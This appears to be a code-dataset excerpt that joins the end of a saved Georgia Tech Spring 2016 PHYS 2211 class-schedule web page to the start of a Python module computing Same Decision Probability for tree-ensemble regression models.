<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22492">Intro Physics I - 22492 - PHYS 2211 - N</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211N
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">8:05 am - 8:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Michael F Schatz (<abbr title="Primary">P</abbr>)<a href="mailto:michael.schatz@physics.gatech.edu" target="Michael F. Schatz"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 152</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Michael F Schatz (<abbr title="Primary">P</abbr>)<a href="mailto:michael.schatz@physics.gatech.edu" target="Michael F. Schatz"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22500">Intro Physics I - 22500 - PHYS 2211 - N01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22501">Intro Physics I - 22501 - PHYS 2211 - N02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22502">Intro Physics I - 22502 - PHYS 2211 - N03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22505">Intro Physics I - 22505 - PHYS 2211 - N04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22503">Intro Physics I - 22503 - PHYS 2211 - N05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22504">Intro Physics I - 22504 - PHYS 2211 - N06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tbody><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</tbody></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=30975">Intro Physics I - 30975 - PHYS 2211 - N07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
</></table>
<br>
<table class="datadisplaytable" summary="This is for formatting of the bottom links." width="50%">
<><tr>
<td class="ntdefault">
<a href="javascript:history.go(-1)" onmouseover="window.status='Return to Previous'; return true" onfocus="window.status='Return to Previous'; return true" onmouseout="window.status=''; return true" onblur="window.status=''; return true">Return to Previous</a>
</td>
</tr>
</></table>
<!-- ** START OF twbkwbis.P_CloseDoc ** -->
<table class="plaintable" summary="This is table displays line separator at end of the page." width="100%" cellspacing="0" cellpadding="0" border="0"><><tr><td class="bgtabon" width="100%" colspan="2"><img src="/wtlgifs/web_transparent.gif" alt="Transparent Image" class="headerImg" title="Transparent Image" name="web_transparent" hspace="0" vspace="0" border="0" height="3" width="10"></td></tr></table>
<a href="#top" onmouseover="window.status='Skip to top of page'; return true" onmouseout="window.status=''; return true" onfocus="window.status='Skip to top of page'; return true" onblur="window.status=''; return true" class="skiplinks">Skip to top of page</a>
</div>
""")
| 45.859847 | 638 | 0.71536 | 18,079 | 113,870 | 4.447923 | 0.024172 | 0.045701 | 0.103664 | 0.091327 | 0.963477 | 0.962656 | 0.9614 | 0.957433 | 0.957433 | 0.956513 | 0 | 0.043144 | 0.087486 | 113,870 | 2,482 | 639 | 45.878324 | 0.730752 | 0 | 0 | 0.966949 | 0 | 0.120919 | 0.999833 | 0.415351 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
9172f89c7bc11605aa428a86afdb7ae7a673d056 | 22,957 | py | Python | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | acv_explainers/utils_sdp.py | aistats2022exp/AccurateShapleyValues | 6662264f6ab9b07dc276d749a154174ddf04601c | [
"MIT"
] | null | null | null | import numpy as np
import itertools
from tqdm import tqdm
from multiprocessing import Pool
from functools import partial
def compute_sdp_reg(X, tX, model, S, data):
    """Same Decision Probability (SDP) of a tree-ensemble *regressor*.

    For each row x of X, estimates the probability that the ensemble's
    prediction stays within squared error ``tX`` of f(x) when the features in
    coalition ``S`` are fixed to x's values and the remaining features follow
    the background sample ``data``.  Conditioning uses interval membership in
    the trees' leaf boxes (continuous features).

    Parameters:
        X (np.ndarray): instances to explain, shape (N, d).
        tX (float): squared-error threshold defining "same decision".
        model: tree-ensemble wrapper exposing ``trees``,
            ``partition_leaves_trees``, ``leaves_nb``, ``leaf_idx_trees``,
            ``values`` and ``predict`` (ACV-style interface — confirm upstream).
        S (list[int]): indices of the conditioning coalition.
        data (np.ndarray): background/reference sample, shape (n, d).

    Returns:
        np.ndarray of shape (N,): SDP estimates clipped into [0, 1].
    """
    N = X.shape[0]
    index = list(range(X.shape[1]))
    # Trivial coalitions: conditioning on every feature pins the prediction;
    # conditioning on none carries no information.
    if len(S) == len(index):
        return np.ones(N)
    elif S == []:
        return np.zeros(N)
    n_trees = len(model.trees)
    y_pred = model.predict(data)
    fX = model.predict(X)
    # Per-instance accumulators over all ordered tree pairs (b, l):
    #   col 0: overall second-moment term, col 1: mass with dist > tX,
    #   col 2: mass with dist <= tX.
    mean_forest = np.zeros((N, 3))
    for b in range(n_trees):
        for l in range(n_trees):
            if b == l:
                # Diagonal pair: single tree's leaves; also subtracts the
                # cross term 2*f(x)*value from the squared-loss expansion.
                leaves_tree = model.partition_leaves_trees[b]
                for leaf_numb in range(model.leaves_nb[b]):
                    leaf_part = leaves_tree[leaf_numb]
                    leaf_id = model.leaf_idx_trees[b, leaf_numb]
                    value = model.values[b, leaf_id]
                    # Instances whose S-features fall inside this leaf box.
                    leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S],
                                        axis=0)
                    if np.sum(leaf_bool) == 0:
                        continue
                    # lm: background rows inside the leaf on *all* features;
                    # p_s: background rows inside the leaf on S only.
                    lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index],
                                 axis=0)
                    p_s = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in
                                   S], axis=0)
                    for i, x in enumerate(X):
                        if leaf_bool[i] == 0:
                            continue
                        # Squared distance of each background prediction to f(x_i).
                        dist = (y_pred - fX[i]) ** 2
                        up_tx = np.array(dist > tX).reshape(-1)
                        down_tx = np.array(dist <= tX).reshape(-1)
                        # p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
                        p_su = np.sum(p_s * up_tx)
                        p_sd = np.sum(p_s * down_tx)
                        p_ss = np.sum(p_s)
                        mean_forest[i, 0] += (np.sum(lm) * value ** 2) / (p_ss) if p_ss != 0 else 0
                        mean_forest[i, 0] -= (2 * fX[i] * np.sum(lm) * value) / (p_ss) if p_ss != 0 else 0
                        mean_forest[i, 1] += (np.sum(lm * up_tx) * value ** 2) / (
                            p_su) if p_su != 0 else 0
                        mean_forest[i, 1] -= (2 * fX[i] * np.sum(lm * up_tx) * value) / (
                            p_su) if p_su != 0 else 0
                        mean_forest[i, 2] += (np.sum(lm * down_tx) * value ** 2) / (
                            p_sd) if p_sd != 0 else 0
                        mean_forest[i, 2] -= (2 * fX[i] * np.sum(lm * down_tx) * value) / (
                            p_sd) if p_sd != 0 else 0
            else:
                # Off-diagonal pair: intersection of one leaf box from tree b
                # with one from tree l (cross product of leaf values).
                for leaf_numb_b in range(model.leaves_nb[b]):
                    leaf_id_b = model.leaf_idx_trees[b, leaf_numb_b]
                    for leaf_numb_l in range(model.leaves_nb[l]):
                        leaf_id_l = model.leaf_idx_trees[l, leaf_numb_l]
                        leaf_part_b = model.partition_leaves_trees[b][leaf_numb_b]
                        value_b = model.values[b, leaf_id_b]
                        leaf_part_l = model.partition_leaves_trees[l][leaf_numb_l]
                        value_l = model.values[l, leaf_id_l]
                        leaf_bool = np.prod([(X[:, s] <= leaf_part_b[s, 1]) * (X[:, s] >= leaf_part_b[s, 0]) *
                                             (X[:, s] <= leaf_part_l[s, 1]) * (X[:, s] >= leaf_part_l[s, 0])
                                             for s in S], axis=0)
                        if np.sum(leaf_bool) == 0.:
                            continue
                        lm = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
                                      (data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
                                      for s in index], axis=0)
                        p_s = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
                                       (data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
                                       for s in S], axis=0)
                        for i, x in enumerate(X):
                            if leaf_bool[i] == 0:
                                continue
                            dist = (y_pred - fX[i]) ** 2
                            up_tx = np.array(dist > tX).reshape(-1)
                            down_tx = np.array(dist <= tX).reshape(-1)
                            # p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
                            p_su = np.sum(p_s * up_tx)
                            p_sd = np.sum(p_s * down_tx)
                            p_ss = np.sum(p_s)
                            mean_forest[i, 0] += (np.sum(lm) * value_b * value_l) / (
                                p_ss) if p_ss != 0 else 0
                            mean_forest[i, 1] += (np.sum(lm * up_tx) * value_b * value_l) / (
                                p_su) if p_su != 0 else 0
                            mean_forest[i, 2] += (np.sum(lm * down_tx) * value_b * value_l) / (
                                p_sd) if p_sd != 0 else 0
    # Ratio (col1 - col0) / (col1 - col2), with zero denominators mapped to 0.
    num = mean_forest[:, 1] - mean_forest[:, 0]
    den = mean_forest[:, 1] - mean_forest[:, 2]
    sdp = np.true_divide(num, den, out=np.zeros(N), where=den != 0)
    # Clip out-of-range ratios: > 1 -> 1, < 0 -> 0.
    return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_reg_cat(X, tX, model, S, data):
    """Same Decision Probability of a tree-ensemble regressor, *categorical*
    variant.

    Identical in structure to ``compute_sdp_reg``, except that the
    conditioning probability ``p_s`` uses exact equality of the S features
    (``data[:, s] == x[s]``) instead of leaf-interval membership, so it is
    recomputed per instance and also weights the leaf mass ``lm``.

    Parameters and return value: see ``compute_sdp_reg``.
    """
    N = X.shape[0]
    index = list(range(X.shape[1]))
    # Trivial coalitions handled up front.
    if len(S) == len(index):
        return np.ones(N)
    elif S == []:
        return np.zeros(N)
    n_trees = len(model.trees)
    y_pred = model.predict(data)
    fX = model.predict(X)
    # Accumulators: col 0 overall term, col 1 "far" (dist > tX),
    # col 2 "near" (dist <= tX), over all ordered tree pairs.
    mean_forest = np.zeros((N, 3))
    for b in range(n_trees):
        for l in range(n_trees):
            if b == l:
                # Diagonal pair: single tree's leaves.
                leaves_tree = model.partition_leaves_trees[b]
                # leaves_tree = model.partition_leaves_trees[l]
                for leaf_numb in range(model.leaves_nb[b]):
                    leaf_part = leaves_tree[leaf_numb]
                    leaf_id = model.leaf_idx_trees[b, leaf_numb]
                    value = model.values[b, leaf_id]
                    # Instances whose S-features lie inside this leaf box.
                    leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S],
                                        axis=0)
                    if np.sum(leaf_bool) == 0:
                        continue
                    # Background rows inside the leaf on all features.
                    lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index],
                                 axis=0)
                    for i, x in enumerate(X):
                        if leaf_bool[i] == 0:
                            continue
                        dist = (y_pred - fX[i]) ** 2
                        up_tx = np.array(dist > tX).reshape(-1)
                        down_tx = np.array(dist <= tX).reshape(-1)
                        # Exact match of the categorical S features of x_i.
                        p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
                        p_su = np.sum(p_s * up_tx)
                        p_sd = np.sum(p_s * down_tx)
                        p_ss = np.sum(p_s)
                        mean_forest[i, 0] += (np.sum(lm * p_s) * value ** 2) / (p_ss) if p_ss != 0 else 0
                        mean_forest[i, 0] -= (2 * fX[i] * np.sum(lm * p_s) * value) / (
                            p_ss) if p_ss != 0 else 0
                        mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value ** 2) / (
                            p_su) if p_su != 0 else 0
                        mean_forest[i, 1] -= (2 * fX[i] * np.sum(lm * p_s * up_tx) * value) / (
                            p_su) if p_su != 0 else 0
                        mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value ** 2) / (
                            p_sd) if p_sd != 0 else 0
                        mean_forest[i, 2] -= (2 * fX[i] * np.sum(lm * p_s * down_tx) * value) / (
                            p_sd) if p_sd != 0 else 0
            else:
                # Off-diagonal pair: intersection of a leaf box from tree b
                # and one from tree l.
                for leaf_numb_b in range(model.leaves_nb[b]):
                    leaf_id_b = model.leaf_idx_trees[b, leaf_numb_b]
                    leaf_part_b = model.partition_leaves_trees[b][leaf_numb_b]
